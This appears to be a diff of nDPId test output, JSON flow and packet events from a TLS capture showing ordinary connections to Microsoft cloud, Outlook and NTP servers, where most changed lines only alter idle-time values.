-00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
-01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} 
+00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1626168079361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079361,"pkt":"WNVuaKQA8BiYFWV8CABFAABM2zIAAEARlFXAqAF5Ef02+8RwAHsAOAx5IwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079361,"flow_last_seen":1626168079361,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168079361,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1626168079391,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168079391,"pkt":"8BiYFWV8WNVuaKQACABFAABMVlxAADcR4isR\/Tb7wKgBeQB7xHAAOKCnJAED6wAAAAAAAAAMU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mPcazl\/+SX2Y9xr5E6"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079905,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079905,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1626168079905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079905,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KcAbuMyd8CAAAAALAC\/\/\/ChQAAAgQFtAEDAwYBAQgKPdIBvwAAAAAEAgAA"} 
-00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079937,"flow_last_seen":1626168079937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079937,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 